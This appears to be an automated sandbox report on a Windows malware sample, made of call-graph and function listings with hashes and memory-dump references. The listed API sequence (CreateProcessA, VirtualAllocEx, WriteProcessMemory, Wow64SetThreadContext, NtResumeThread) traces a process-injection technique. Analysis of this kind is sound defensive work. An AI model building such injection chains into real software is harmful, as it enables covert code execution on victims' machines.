56045 55401ff 55968->56045 56050 55404b2 55968->56050 56055 55412b0 55968->56055 56060 554054b 55968->56060 56065 554030b 55968->56065 56070 55409c9 55968->56070 56075 5541008 55968->56075 56081 5540e0d 55968->56081 56086 5541441 55968->56086 56091 5540840 55968->56091 56096 55411c0 55968->56096 56104 5540687 55968->56104 56109 5540986 55968->56109 56114 5540bc4 55968->56114 56119 554115b 55968->56119 56127 5540a5a 55968->56127 56135 55407df 55968->56135 56140 554135e 55968->56140 55999 5540208 55997->55999 55998 55400ac 55999->55998 56146 55491f1 55999->56146 56150 55491f8 55999->56150 56004 5540208 56002->56004 56003 55400ac 56004->56003 56005 55491f1 WriteProcessMemory 56004->56005 56006 55491f8 WriteProcessMemory 56004->56006 56005->56004 56006->56004 56009 55401c1 56007->56009 56008 55400ac 56009->56008 56010 55491f1 WriteProcessMemory 56009->56010 56011 55491f8 WriteProcessMemory 56009->56011 56010->56009 56011->56009 56013 5540644 56012->56013 56154 5541879 56013->56154 56159 5541888 56013->56159 56014 554065c 56019 5540208 56017->56019 56018 55400ac 56019->56018 56020 55491f1 WriteProcessMemory 56019->56020 56021 55491f8 WriteProcessMemory 56019->56021 56020->56019 56021->56019 56023 55403eb 56022->56023 56182 5549cf0 56023->56182 56186 5549ce8 56023->56186 56024 5540443 56029 5540208 56027->56029 56028 55400ac 56029->56028 56030 55491f1 WriteProcessMemory 56029->56030 56031 55491f8 WriteProcessMemory 56029->56031 56030->56029 56031->56029 56033 554022a 56032->56033 56190 5548ef2 56033->56190 56194 5548ef8 56033->56194 56034 55400ac 56035 5540208 56035->56034 56036 55491f1 WriteProcessMemory 56035->56036 56037 55491f8 WriteProcessMemory 56035->56037 56036->56035 56037->56035 56042 5540208 56040->56042 56041 55400ac 56042->56041 56043 55491f1 WriteProcessMemory 56042->56043 56044 55491f8 WriteProcessMemory 56042->56044 56043->56042 56044->56042 56047 5540208 56045->56047 56046 55400ac 56047->56046 56048 55491f1 WriteProcessMemory 56047->56048 56049 55491f8 WriteProcessMemory 56047->56049 56048->56047 56049->56047 56052 5540208 56050->56052 56051 55400ac 56052->56051 56053 55491f1 WriteProcessMemory 56052->56053 56054 55491f8 WriteProcessMemory 56052->56054 56053->56052 56054->56052 56057 5540208 56055->56057 56056 55400ac 56057->56056 56058 55491f1 WriteProcessMemory 56057->56058 56059 55491f8 WriteProcessMemory 56057->56059 56058->56057 56059->56057 56061 5540208 56060->56061 56061->56060 56062 55400ac 56061->56062 56063 55491f1 WriteProcessMemory 56061->56063 56064 55491f8 WriteProcessMemory 56061->56064 56063->56061 56064->56061 56066 554031a 56065->56066 56068 55491f1 WriteProcessMemory 56066->56068 56069 55491f8 WriteProcessMemory 56066->56069 56067 542e667 56067->55921 56068->56067 56069->56067 56072 5540208 56070->56072 56071 55400ac 56072->56071 56073 55491f1 WriteProcessMemory 56072->56073 56074 55491f8 WriteProcessMemory 56072->56074 56073->56072 56074->56072 56076 5541015 56075->56076 56077 5540407 56075->56077 56079 5549cf0 NtResumeThread 56077->56079 56080 5549ce8 NtResumeThread 56077->56080 56078 5540443 56079->56078 56080->56078 56083 5540208 56081->56083 56082 55400ac 56083->56082 56084 55491f1 WriteProcessMemory 56083->56084 56085 55491f8 WriteProcessMemory 56083->56085 56084->56083 56085->56083 56088 5540208 56086->56088 56087 55400ac 56088->56087 56089 55491f1 WriteProcessMemory 56088->56089 56090 55491f8 WriteProcessMemory 56088->56090 56089->56088 56090->56088 56092 554084f 56091->56092 56198 5548832 56092->56198 56202 5548838 56092->56202 56093 554087b 56097 55411cf 56096->56097 56100 55491f1 WriteProcessMemory 56097->56100 56101 55491f8 WriteProcessMemory 56097->56101 56098 55400ac 56099 5540208 56099->56098 56102 55491f1 WriteProcessMemory 56099->56102 56103 55491f8 WriteProcessMemory 56099->56103 56100->56099 56101->56099 56102->56099 56103->56099 56106 5540208 56104->56106 56105 55400ac 56106->56105 56107 55491f1 WriteProcessMemory 56106->56107 56108 55491f8 WriteProcessMemory 56106->56108 56107->56106 56108->56106 56111 5540208 56109->56111 56110 55400ac 56111->56110 56112 55491f1 WriteProcessMemory 56111->56112 56113 55491f8 WriteProcessMemory 56111->56113 56112->56111 56113->56111 56116 5540208 56114->56116 56115 55400ac 56116->56115 56117 55491f1 WriteProcessMemory 56116->56117 56118 55491f8 WriteProcessMemory 56116->56118 56117->56116 56118->56116 56120 5540246 56119->56120 56122 5540208 56119->56122 56123 5548ef2 VirtualAllocEx 56120->56123 56124 5548ef8 VirtualAllocEx 56120->56124 56121 55400ac 56122->56121 56125 55491f1 WriteProcessMemory 56122->56125 56126 55491f8 WriteProcessMemory 56122->56126 56123->56122 56124->56122 56125->56122 56126->56122 56128 5540a5c 56127->56128 56131 5548832 Wow64SetThreadContext 56128->56131 56132 5548838 Wow64SetThreadContext 56128->56132 56129 55400ac 56130 5540208 56130->56129 56133 55491f1 WriteProcessMemory 56130->56133 56134 55491f8 WriteProcessMemory 56130->56134 56131->56130 56132->56130 56133->56130 56134->56130 56137 5540208 56135->56137 56136 55400ac 56137->56136 56138 55491f1 WriteProcessMemory 56137->56138 56139 55491f8 WriteProcessMemory 56137->56139 56138->56137 56139->56137 56141 5541368 56140->56141 56142 554083f 56140->56142 56144 5548832 Wow64SetThreadContext 56142->56144 56145 5548838 Wow64SetThreadContext 56142->56145 56143 554087b 56144->56143 56145->56143 56147 5549244 WriteProcessMemory 56146->56147 56149 55492dd 56147->56149 56149->55999 56151 5549244 WriteProcessMemory 56150->56151 56153 55492dd 56151->56153 56153->55999 56155 5541888 56154->56155 56158 55418c1 56155->56158 56164 5541ad5 56155->56164 56169 5541b51 56155->56169 56158->56014 56160 554189f 56159->56160 56161 5541ad5 2 API calls 56160->56161 56162 5541b51 2 API calls 56160->56162 56163 55418c1 56160->56163 56161->56163 56162->56163 56163->56014 56165 5541ae4 56164->56165 56174 5547f6c 56165->56174 56178 5547f78 56165->56178 56170 5541b79 56169->56170 56172 5547f6c CreateProcessA 56170->56172 56173 5547f78 CreateProcessA 56170->56173 56171 55420f1 56172->56171 56173->56171 56176 5547ff8 CreateProcessA 56174->56176 56177 55481f4 56176->56177 56180 5547ff8 CreateProcessA 56178->56180 56181 55481f4 56180->56181 56183 5549d39 NtResumeThread 56182->56183 56185 5549d90 56183->56185 56185->56024 56187 5549cf0 NtResumeThread 56186->56187 56189 5549d90 56187->56189 56189->56024 56191 5548ef8 VirtualAllocEx 56190->56191 56193 5548fb4 56191->56193 56193->56035 56195 5548f3c VirtualAllocEx 56194->56195 56197 5548fb4 56195->56197 56197->56035 56199 5548838 Wow64SetThreadContext 56198->56199 56201 55488f9 56199->56201 56201->56093 56203 5548881 Wow64SetThreadContext 56202->56203 56205 55488f9 56203->56205 56205->56093 55821 5457359 55822 5457363 55821->55822 55826 521d4a0 55822->55826 55831 521d493 55822->55831 55823 5456f37 55827 521d4b5 55826->55827 55837 521d8e8 55827->55837 55842 521d8d8 55827->55842 55828 521d4cb 55828->55823 55832 521d49a 55831->55832 55833 521d43c 55831->55833 55835 521d8e8 2 API calls 55832->55835 55836 521d8d8 2 API calls 55832->55836 55833->55823 55834 521d4cb 55834->55823 55835->55834 55836->55834 55839 521d90f 55837->55839 55838 521db04 55838->55828 55839->55838 55847 5422030 55839->55847 55851 5422038 55839->55851 55844 521d90f 55842->55844 55843 521db04 55843->55828 55844->55843 55845 5422030 SleepEx 55844->55845 55846 5422038 SleepEx 55844->55846 55845->55844 55846->55844 55848 5422038 SleepEx 55847->55848 55850 54220dc 55848->55850 55850->55839 55852 542207c SleepEx 55851->55852 55854 54220dc 55852->55854 55854->55839

                                              Executed Functions

                                              Function 00CFCBA0 Relevance: 2.6, Strings: 1, Instructions: 1339COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 41 cfcba0-cfcbde 42 cfcbe5-cfcd07 41->42 43 cfcbe0 41->43 47 cfcd2b-cfcd37 42->47 48 cfcd09-cfcd1f 42->48 43->42 49 cfcd3e-cfcd43 47->49 50 cfcd39 47->50 325 cfcd25 call cff733 48->325 326 cfcd25 call cff740 48->326 52 cfcd7b-cfcdc4 49->52 53 cfcd45-cfcd51 49->53 50->49 61 cfcdcb-cfd090 52->61 62 cfcdc6 52->62 54 cfcd58-cfcd76 53->54 55 cfcd53 53->55 56 cfe4df-cfe4e5 54->56 55->54 58 cfe4e7-cfe507 56->58 59 cfe510 56->59 58->59 88 cfdac0-cfdacc 61->88 62->61 89 cfd095-cfd0a1 88->89 90 cfdad2-cfdb0a 88->90 91 cfd0a8-cfd1cd 89->91 92 cfd0a3 89->92 99 cfdbe4-cfdbea 90->99 127 cfd1cf-cfd207 91->127 128 cfd20d-cfd296 91->128 92->91 100 cfdb0f-cfdb8c 99->100 101 cfdbf0-cfdc28 99->101 116 cfdbbf-cfdbe1 100->116 117 cfdb8e-cfdb92 100->117 111 cfdf86-cfdf8c 101->111 113 cfdc2d-cfde2f 111->113 114 cfdf92-cfdfda 111->114 208 cfdece-cfded2 113->208 209 cfde35-cfdec9 113->209 122 cfdfdc-cfe04f 114->122 123 cfe055-cfe0a0 114->123 116->99 117->116 121 cfdb94-cfdbbc 117->121 121->116 122->123 146 cfe4a9-cfe4af 123->146 127->128 155 cfd298-cfd2a0 128->155 156 cfd2a5-cfd329 128->156 148 cfe0a5-cfe0b5 146->148 149 cfe4b5-cfe4dd 146->149 160 cfe0c1-cfe127 148->160 149->56 157 cfdab1-cfdabd 155->157 183 cfd32b-cfd333 156->183 184 cfd338-cfd3bc 156->184 157->88 167 cfe14f-cfe15b 160->167 168 cfe129-cfe144 160->168 170 cfe15d 167->170 171 cfe162-cfe16e 167->171 168->167 170->171 175 cfe181-cfe190 171->175 176 cfe170-cfe17c 171->176 179 cfe199-cfe471 175->179 180 cfe192 175->180 178 cfe490-cfe4a6 176->178 178->146 212 cfe47c-cfe488 179->212 180->179 185 cfe19f-cfe208 180->185 186 cfe20d-cfe285 180->186 187 cfe28a-cfe2f3 180->187 188 cfe2f8-cfe361 180->188 189 cfe366-cfe3ce 180->189 183->157 231 cfd3be-cfd3c6 184->231 232 cfd3cb-cfd44f 184->232 185->212 186->212 187->212 188->212 219 cfe442-cfe448 189->219 214 cfdf2f-cfdf6c 208->214 215 cfded4-cfdf2d 208->215 233 cfdf6d-cfdf83 209->233 212->178 214->233 215->233 224 cfe44a-cfe454 219->224 225 cfe3d0-cfe42e 219->225 224->212 236 cfe435-cfe43f 225->236 237 cfe430 225->237 231->157 246 cfd45e-cfd4e2 232->246 247 cfd451-cfd459 232->247 233->111 236->219 237->236 253 cfd4e4-cfd4ec 246->253 254 cfd4f1-cfd575 246->254 247->157 253->157 260 cfd577-cfd57f 254->260 261 cfd584-cfd608 254->261 260->157 267 cfd60a-cfd612 261->267 268 cfd617-cfd69b 261->268 267->157 274 cfd69d-cfd6a5 268->274 275 cfd6aa-cfd72e 268->275 274->157 281 cfd73d-cfd7c1 275->281 282 cfd730-cfd738 275->282 288 cfd7c3-cfd7cb 281->288 289 cfd7d0-cfd854 281->289 282->157 288->157 295 cfd856-cfd85e 289->295 296 cfd863-cfd8e7 289->296 295->157 302 cfd8e9-cfd8f1 296->302 303 cfd8f6-cfd97a 296->303 302->157 309 cfd97c-cfd984 303->309 310 cfd989-cfda0d 303->310 309->157 316 cfda0f-cfda17 310->316 317 cfda1c-cfdaa0 310->317 316->157 323 cfdaac-cfdaae 317->323 324 cfdaa2-cfdaaa 317->324 323->157 324->157 325->47 326->47
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2618695013.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_cf0000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 2
                                              • API String ID: 0-450215437
                                              • Opcode ID: df49773ee9c5b075041d1549f7156634eef748c027c2a487bbd51abe7e411516
                                              • Instruction ID: 1c3c949a9fff3493cdb90bacf815516e85f1eb99785a97eb5f983a6d66c001ab
                                              • Opcode Fuzzy Hash: df49773ee9c5b075041d1549f7156634eef748c027c2a487bbd51abe7e411516
                                              • Instruction Fuzzy Hash: 98E2E474E006288FCB64DF69D894B9EBBB2FB89305F1081EAD50AA7355DB305E81DF50
                                              Function 0545CDA0 Relevance: 2.4, Strings: 1, Instructions: 1176COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2633577760.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5450000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4
                                              • API String ID: 0-4088798008
                                              • Opcode ID: fd8c6865da996dff88dcc4dbe0cf2a921bfab72b0cb89db012ec0fb73c450a44
                                              • Instruction ID: 229ec9884c1430285d6a12cae596abd355b03e7b98a61a82774c892ceaf51dba
                                              • Opcode Fuzzy Hash: fd8c6865da996dff88dcc4dbe0cf2a921bfab72b0cb89db012ec0fb73c450a44
                                              • Instruction Fuzzy Hash: DFB2E834A00218CFDB14DFA4C994BAEB7B6FF88314F154596E905AB3A5CB70AD46CF50
                                              Function 00CFA660 Relevance: 1.0, Instructions: 956COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2618695013.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_cf0000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c6bbc20d96b088c53974f8421ec8b3a357199a3ded49609b0c458c6222ac399e
                                              • Instruction ID: 9e4ed4a65672fac892e24a521bb4e08d1b78c3ed6e002d69c9a034c8e4604403
                                              • Opcode Fuzzy Hash: c6bbc20d96b088c53974f8421ec8b3a357199a3ded49609b0c458c6222ac399e
                                              • Instruction Fuzzy Hash: 80A2B375A00628CFDB65CF69C984A9DBBB2BF89300F1581E9D50DAB321DB319E81DF41
                                              Function 05218C38 Relevance: .6, Instructions: 607COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d35a1515dc1bab254e9976825e0d38af5feb538b5866cf4c4777462bb88840ea
                                              • Instruction ID: 18ba53ff2347631e8e3f7ae3217ea3ff04679644ea859d526b4cb192f11ce692
                                              • Opcode Fuzzy Hash: d35a1515dc1bab254e9976825e0d38af5feb538b5866cf4c4777462bb88840ea
                                              • Instruction Fuzzy Hash: C3324A70B106168FDB18DF69C495A7EBBF2FF88300F248529D95AD7381DB34A941CB98
                                              Function 00CFE513 Relevance: .5, Instructions: 539COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2618695013.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_cf0000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 92122db592c2ba88bc4e0f97f745c2b2b412b139f225a4a62f94a877f0b26a9b
                                              • Instruction ID: fe5ac993fca03e9873249ab54329bc377bf8f37da6552259c0987c96b763aeed
                                              • Opcode Fuzzy Hash: 92122db592c2ba88bc4e0f97f745c2b2b412b139f225a4a62f94a877f0b26a9b
                                              • Instruction Fuzzy Hash: FE52C374A006298FCB64DF28C988B9EBBB1FB89305F1091D9E50DA7355DB30AE81DF51
                                              Function 0521E586 Relevance: .3, Instructions: 256COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 831f307278e763149f4de081f37ea7472152afb704d56f864f857f6a652e1ec1
                                              • Instruction ID: 451f7af1fbf3164379a313e72d41e2b6d89cf5285f06b8b5db1db9f7bd7836a8
                                              • Opcode Fuzzy Hash: 831f307278e763149f4de081f37ea7472152afb704d56f864f857f6a652e1ec1
                                              • Instruction Fuzzy Hash: 71C13974E14249CFEB50DF69C885BAEBBF6FF49304F2280A9D80AA7254DB745985CF04
                                              Function 00CF0D38 Relevance: .2, Instructions: 199COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2618695013.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_cf0000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aca571e7514cc2ad4d429be7588247c5fe5f5563bdc08d8ca084c8684606d411
                                              • Instruction ID: af261775a84aad3e3b54c9661cfba850858958d4bab9346399e983ad89cb2786
                                              • Opcode Fuzzy Hash: aca571e7514cc2ad4d429be7588247c5fe5f5563bdc08d8ca084c8684606d411
                                              • Instruction Fuzzy Hash: A9716231A04109CFCB54DBA9C884ABEB7B1BF49710F318666E165EB3A2CB31DD41DB52
                                              Function 00CF101F Relevance: 1.6, Strings: 1, Instructions: 304COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2618695013.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_cf0000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: cf15eeac38ea58c6c492dbf5f8cf4b6a5c13040f2baa7e9dcace5860d66acb40
                                              • Instruction ID: 64305ae26171ba275d0c10aa924cd9f7784373a0a9000388f05b445b47f90aed
                                              • Opcode Fuzzy Hash: cf15eeac38ea58c6c492dbf5f8cf4b6a5c13040f2baa7e9dcace5860d66acb40
                                              • Instruction Fuzzy Hash: 67C13934B04148CFDB44DBA9D498B6DBBF2EF89710F298069E906DB3A1CA309D45DB52
                                              Function 00CF5132 Relevance: 1.4, Instructions: 1417COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2618695013.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_cf0000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c9bda25e0a5fce3856d478517465c1dc5609a3521ec6c49818bbef369e841cc5
                                              • Instruction ID: 8e77f2692d40f5235fb7b119f59e414fa733ad5cea5239cebcd3c80fb32782aa
                                              • Opcode Fuzzy Hash: c9bda25e0a5fce3856d478517465c1dc5609a3521ec6c49818bbef369e841cc5
                                              • Instruction Fuzzy Hash: D8D2077A250510EFDB4A9F98D988D55BBB2FF4D32471A81D8F6099B232C732D861EF40
                                              Function 00CF5165 Relevance: 1.4, Instructions: 1413COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2618695013.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_cf0000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 577bdc1ec6e310dd4c4b64b90877cf8e213f7b48e4fd8a957aa2675aef16449c
                                              • Instruction ID: b89d1ea4e895da89a8fd0187bb8701ed01c629f5e3c99edbf51c6df9a022df26
                                              • Opcode Fuzzy Hash: 577bdc1ec6e310dd4c4b64b90877cf8e213f7b48e4fd8a957aa2675aef16449c
                                              • Instruction Fuzzy Hash: 68D2077A250510EFDB4A9F98D988D55BBB2FF4D32471A81D8F6099B232C732D861EF40
                                              Function 05211718 Relevance: .7, Instructions: 677COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f8b1a52c0d22af9a4f2dc905e6c808fa8428b79810941a3e6b98839718bc2950
                                              • Instruction ID: a464ad6752c718225323155d28f2624fe6cca9971416fe29acbae97a6c0a946c
                                              • Opcode Fuzzy Hash: f8b1a52c0d22af9a4f2dc905e6c808fa8428b79810941a3e6b98839718bc2950
                                              • Instruction Fuzzy Hash: 68521875A102288FDB24DF68C995BEDBBF2BF88300F1541D9E549AB351DA309E81CF61
                                              Function 05051EA8 Relevance: .6, Instructions: 577COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632165265.0000000005050000.00000040.00000800.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5050000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c20a85d173cb8e603af210d0349e3913f525aaf2351af9029afb3b860f8c0c1a
                                              • Instruction ID: ed164565b520eb6c6ecd0e55f94d6b0b5a2a720d18caf7a177c990f6f7fcbf89
                                              • Opcode Fuzzy Hash: c20a85d173cb8e603af210d0349e3913f525aaf2351af9029afb3b860f8c0c1a
                                              • Instruction Fuzzy Hash: 8042C878E0420ADFDB14DBA8E489ABEBBB2FF88321F508015E95267354DB345D46CF51
                                              Function 05052EB8 Relevance: .5, Instructions: 488COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632165265.0000000005050000.00000040.00000800.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5050000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6cb440dd2ea6780f507a82adb2f34fedcc597c556c6e7962780e26902ce8be76
                                              • Instruction ID: 03d53c8b831a7f957565876e3722d832ac10ed1ee83d27a48f226ec2795fe197
                                              • Opcode Fuzzy Hash: 6cb440dd2ea6780f507a82adb2f34fedcc597c556c6e7962780e26902ce8be76
                                              • Instruction Fuzzy Hash: ED220730E10218CFCB65DFA4E458AEDBBB6FF8A315F508469E80AAB254CB355D85CF01
                                              Function 05214728 Relevance: .4, Instructions: 437COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ae5812e7292b25f33e57d32b777b9cc50072d1902b621510cc34e20ca09353db
                                              • Instruction ID: f432385c1a49cd21fddbecc1b25edeeebe07cc4e1b65ba71b591ac09410f3d43
                                              • Opcode Fuzzy Hash: ae5812e7292b25f33e57d32b777b9cc50072d1902b621510cc34e20ca09353db
                                              • Instruction Fuzzy Hash: DA12ED34B102158FCB14EF64C898B9EB7B2BF99300F5185A8D94AAB355DF70AD85CF84
                                              Function 05210830 Relevance: .4, Instructions: 370COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a7309224f788e2fe40b54fb4ef59932c8cb1a26d0c5e5c38c367692ec87cec6d
                                              • Instruction ID: 98b7d1bd545d67a91fdda94ff4755aee3f53c2781e78f20fff28927ce6ed93df
                                              • Opcode Fuzzy Hash: a7309224f788e2fe40b54fb4ef59932c8cb1a26d0c5e5c38c367692ec87cec6d
                                              • Instruction Fuzzy Hash: 42F1AA34B10118DFDB08DFA4D998A9EBBB2FF88300F158555E906AB365DB75EC82CB44
                                              Function 050529D0 Relevance: .4, Instructions: 362COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632165265.0000000005050000.00000040.00000800.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5050000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f27147fedd2112d5c11450dedb3b32dcaa54f3e621e4bd6b283e33474e37fef9
                                              • Instruction ID: b3682dbadaa3ae8234f66739754ef8a6b995f5a3ae9dbe799ab1529766a915ef
                                              • Opcode Fuzzy Hash: f27147fedd2112d5c11450dedb3b32dcaa54f3e621e4bd6b283e33474e37fef9
                                              • Instruction Fuzzy Hash: 1CF1D634E05209DFCF54DFA4E599AAEBBB6FF89325F204429E806A7351DB345982CF40
                                              Function 05214E20 Relevance: .4, Instructions: 359COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 94ce9a3b1981a307dc46c91b86e3975f1aea35b442dff81b8e25ba881bcfe5a6
                                              • Instruction ID: 1aca33c3dd2a4cfc34c43d7f8dfdcaa77ca715b93cecc203d43d022f1cca7115
                                              • Opcode Fuzzy Hash: 94ce9a3b1981a307dc46c91b86e3975f1aea35b442dff81b8e25ba881bcfe5a6
                                              • Instruction Fuzzy Hash: 7EE10F34B10209DFCB04EF64D4999AE7BB2FFC9310F108569E805AB365DB34AD42CB95
                                              Function 05214718 Relevance: .2, Instructions: 236COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5e9c354566e33a8a8f5c964f33aaaf4d536c0f7ad8b7ffc9078bc6d55b87826e
                                              • Instruction ID: 6d7f4cdb6d4c9a962c19aea97a2a4c29d405e046e29e9ee362cf0bb2ed33775e
                                              • Opcode Fuzzy Hash: 5e9c354566e33a8a8f5c964f33aaaf4d536c0f7ad8b7ffc9078bc6d55b87826e
                                              • Instruction Fuzzy Hash: 25A1FC34B102158FDB14EF24C898B9EBBB2BF98300F5585A8E94AAB351DF749D85CF44
                                              Function 05210820 Relevance: .2, Instructions: 225COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c4d47c2d70be5f79bb8123b6747437dfed2fba761ac6c99268cf18f709e691f0
                                              • Instruction ID: 1772ddb89118bd6afc2c7d819be7b85133bb89690afaa1863b8e6206c561c4f0
                                              • Opcode Fuzzy Hash: c4d47c2d70be5f79bb8123b6747437dfed2fba761ac6c99268cf18f709e691f0
                                              • Instruction Fuzzy Hash: CCA1BD34B10219DFDB04DFA4D998A9EBBB2FF98300F158155E806AB365DF74AC86CB44
                                              Function 052156D0 Relevance: .2, Instructions: 220COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2546a8b66a7697c6e6385b5fc5b6b5115e4173d815e77f6b8279f909decd9a51
                                              • Instruction ID: 82607853a5a8879663d9fccf029e0118f4ba1f138f61c821f8c73b41d46f6ac0
                                              • Opcode Fuzzy Hash: 2546a8b66a7697c6e6385b5fc5b6b5115e4173d815e77f6b8279f909decd9a51
                                              • Instruction Fuzzy Hash: 7A812B347202149FDB04DF68D498A6EBBF6FF88710F1541A9E9069B3A1DB74EC41CB94
                                              Function 00CF3B90 Relevance: .2, Instructions: 211COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2618695013.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
